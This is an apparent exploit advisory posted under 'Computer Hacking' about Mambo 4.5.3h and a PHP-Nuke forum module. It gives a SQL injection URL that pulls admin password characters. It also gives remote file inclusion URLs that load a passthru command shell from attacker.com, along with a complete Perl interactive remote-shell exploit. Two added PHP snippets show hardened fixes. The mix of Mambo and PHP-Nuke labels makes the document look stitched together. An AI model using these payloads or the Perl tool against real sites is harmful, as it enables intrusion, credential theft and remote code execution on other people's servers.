Mambo v4.5.3h Remote File Inclusion

Author: roninmorgue
Date: May 29th, 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/

------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This software is OSI Certified Open Source Software.
OSI Certified is a certification mark of the Open Source Initiative.

Mambo is Open Source software, released under the GNU General Public License (GPL).
The Mambo name and asterisk logo are copyrighted by the Mambo Foundation.

For more detailed information on Mambo’s licensing terms see the LICENSE file.
For more information on the Mambo Foundation,
please visit http://www.mambo-foundation.org.

Version: 4.5.3h
Tested on 4.5.3h.
Other, older, or newer versions have not been tested, but they may be
affected in the same way.
-----------------------------------------------------------------
A. SQL Injection

The mosMenuCheck() function does not sanitize the $task parameter.

/includes/mambo.php

function mosMenuCheck( $Itemid, $menu_option, $task, $gid ) {
    global $database;
    $dblink="index.php?option=$menu_option";
    if ($Itemid!="" && $Itemid!=0) {
        $database->setQuery( "SELECT access FROM #__menu WHERE id='$Itemid'" );
    } else {
        if ($task!="") {
            $dblink.="&task=$task";
        }
        $database->setQuery( "SELECT access FROM #__menu WHERE link like '$dblink%'" );
    }
    $results = $database->loadObjectList();
    $access = 0;
    //echo "<pre>"; print_r($results); echo "</pre>";
    foreach ($results as $result) {
        $access = max( $access, $result->access );
    }
    return ($access <= $gid);
}
=========================snip=======================
The unsanitized $task variable is used in the query whenever $Itemid is empty.

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable script: mambo.php in the /includes folder.

SQL injection sample ->
http://www.target.com/index2.php?option ... %20FROM%20
mos_users%20WHERE%20username=’admin’%20AND%20MID(password,1,1)=
‘2’/*&id=24&Itemid=0
This works when "magic_quotes_gpc" is disabled/off.
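A hardened rewrite of the mosMenuCheck() function above, added here as an example and not Mambo's own fix. It assumes only what the original shows: a global $database object with setQuery() and loadObjectList(); the input checks themselves are plain PHP.

```php
<?php
// Added example, not Mambo's own code: a hardened mosMenuCheck() for the
// /includes/mambo.php issue described above. Assumes a global $database
// object with setQuery() and loadObjectList(), as in the original.

function mosMenuCheck( $Itemid, $menu_option, $task, $gid ) {
    global $database;

    // A menu id is always numeric: casting strips quotes, comment markers
    // and anything else the original let through in "WHERE id='$Itemid'".
    $Itemid = intval( $Itemid );

    // Component and task names are identifiers. Reject anything outside
    // [A-Za-z0-9_] instead of trying to escape it; this is the check that
    // closes the $task hole reached when $Itemid is empty.
    if ( !preg_match( '/^[A-Za-z0-9_]*$/', $menu_option )
      || !preg_match( '/^[A-Za-z0-9_]*$/', $task ) ) {
        return false;   // deny on malformed input; run no query at all
    }

    if ( $Itemid != 0 ) {
        $database->setQuery( "SELECT access FROM #__menu WHERE id=$Itemid" );
    } else {
        $dblink = "index.php?option=$menu_option";
        if ( $task != '' ) {
            $dblink .= "&task=$task";
        }
        // '_' is a LIKE wildcard (com_content etc. contain it); escape it so
        // the prefix match stays literal and cannot be widened.
        $dblink = addcslashes( $dblink, '%_' );
        $database->setQuery( "SELECT access FROM #__menu WHERE link LIKE '$dblink%'" );
    }

    $results = $database->loadObjectList();
    $access  = 0;
    foreach ( $results as $result ) {
        $access = max( $access, (int) $result->access );
    }
    return ( $access <= $gid );
}
```

Rejecting bad identifiers outright, rather than escaping them, also means a malformed $task never reaches the query log, which keeps the failed attempts visible as plain denied requests.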
------------------------------------------------------------------
B. Remote File Inclusion

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable script: usercp_confirm.php in the modules/Forums folder.

---------------usercp_confirm.php--------------------------------
...
include_once($phpbb_root_path . 'extension.inc');
...
------------------------------------------------------------------

The $phpbb_root_path variable is not properly sanitized.
When register_globals=on and allow_url_fopen=on, an attacker can exploit this
weakness with a PHP injection script.

Poc/Exploit:
~~~~~~~~~~~

http://www.target.com/[phpnuke_path]/modules.php?name=Forums&file=usercp_confirm?phpbb_root_path=http://www.attacker.com/evil_script?

cmd.txt
<?
echo "".passthru(' ls -la ; id ')."";
?>

http://www.target.com/[phpnuke_path]/modules.php?name=Forums&file=usercp_confirm?phpbb_root_path=http://www.attacker.com/cmd.txt?

Solution/The Fix:
~~~~~~~~~~~~~~
Disable or delete the forum module.
Sanitize the script in usercp_confirm.php to prevent this vulnerability.
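One way to apply the fix above, added here as an example and not the forum module's own code: the weak include from usercp_confirm.php beside a hardened form. It assumes the module's entry point defines IN_PHPBB before including this file, as phpBB-derived scripts expect; safe_include_once() is a local helper, not a phpBB API.

```php
<?php
// Added example, not the forum module's own code. Assumes the entry point
// defines IN_PHPBB before including this file; safe_include_once() is a
// local helper written for this example.

// Weak, as shipped: with register_globals=On the request can set
// $phpbb_root_path, and with allow_url_fopen=On include_once() fetches and
// runs http://attacker/... followed by 'extension.inc'.
//
//     include_once($phpbb_root_path . 'extension.inc');

// Hardened:

// 1. Refuse to run unless reached through the module entry point.
if ( !defined( 'IN_PHPBB' ) ) {
    die( 'Hacking attempt' );
}

// 2. Never read the root path from the request. Pin it to this script's own
//    directory, overwriting anything register_globals may have injected.
$phpbb_root_path = dirname( __FILE__ ) . '/';

// 3. Resolve the final path and confirm it is a local file inside that
//    directory. realpath() returns false for http://, ftp://, php:// and
//    data: wrappers, and the prefix check rejects ../ traversal, so the
//    include is safe whatever the php.ini settings are.
function safe_include_once( $root, $file ) {
    $base = realpath( $root );
    $path = realpath( $root . $file );
    if ( $base === false || $path === false || !is_file( $path )
      || strpos( $path, $base . DIRECTORY_SEPARATOR ) !== 0 ) {
        die( 'Invalid include path' );
    }
    include_once( $path );
}

safe_include_once( $phpbb_root_path, 'extension.inc' );
```

On the server side, register_globals = Off and allow_url_fopen = Off in php.ini (plus allow_url_include = Off on PHP 5.2 and later) remove the two preconditions named above, independently of the code fix.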

Notification:
~~~~~~~~~~~
The vendor has been contacted.
-----------------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, cloud, newbie)
~ mercubuana-it@yahoogroups.com ,

----------------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id

------------------------- [ EOF ] -------------------------------

Perl Exploit:
~~~~~~~~~~~
#!/usr/bin/perl
##
# PHP-Nuke-7.8 Remote Code Execution Exploit
# Bug Found & code By roninmorgue
# code reference from K-159 & uid0/zod at ExploiterCode.com
##
# usage:
# perl PHP-Nuke.pl <target> <cmd shell location> <cmd shell variable>
# perl PHP-Nuke.pl http://target.com/ http://attacker.com/cmd.txt cmd
# cmd shell example: <?passthru($_GET[cmd]);?>
# cmd shell variable: ($_GET[cmd]);
##
# Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org
##

use LWP::UserAgent;

$Directory = $ARGV[0];
$DirectoryCommand = $ARGV[1];
$command = $ARGV[2];

if($Directory!~/http:\/\// || $DirectoryCommand!~/http:\/\// || !$command){usage()}
head();
while()
{
print "[shell] $";
while(<STDIN>)
{
$cmdshell=$_;
chomp($cmdshell);

$exploit = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Directory.'/modules.php?name=Forums&file=usercp_confirm?phpbb_root_path='.$DirectoryCommand.'?&'.$command.'='.$cmdshell)
or die " Could Not connect ";

$res = $exploit->request($req);
$return = $res->content;
$return =~ tr/[ ]/[ê]/;

if (!$cmdshell) {print " Please Enter a Command "; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ ||
$return =~/: Cannot execute a blank command in <b>/)
{print " Could Not Connect to cmd Host or Invalid Command Variable ";exit}
elsif ($return =~/^<br.>.<b>Fatal.error/) {print " Invalid Command or No Return "}

if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[ê]/[ ]/;
print " $finreturn ";
last;
}
else {print "[shell] $";}}}last;
sub head()
{
print " ======================================================= ";
print " *MamboV4.5.3 Remote File Inclusion* ";
print "======================================================== ";
}
sub usage()
{
head();
print " Usage: perl PHP-Nuke.pl <target> <cmd shell location> <cmd shell variable> ";
print " <Site> - Full path to PHP-Nuke ex: http://www.site.com/ ";
print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt ";
print " <cmd variable> - Command variable used in php shell ";
print "====================================================== ";
print " Bug Found by roninmorgue ";
print " Contact: roninmorgue@yahoo.co.id || http://www.forum.mercubuana-it.org ";
print "====================================================== ";
exit();
}

Posted by roninmorgue on 08/25 at 01:13 AM in Computer Hacking
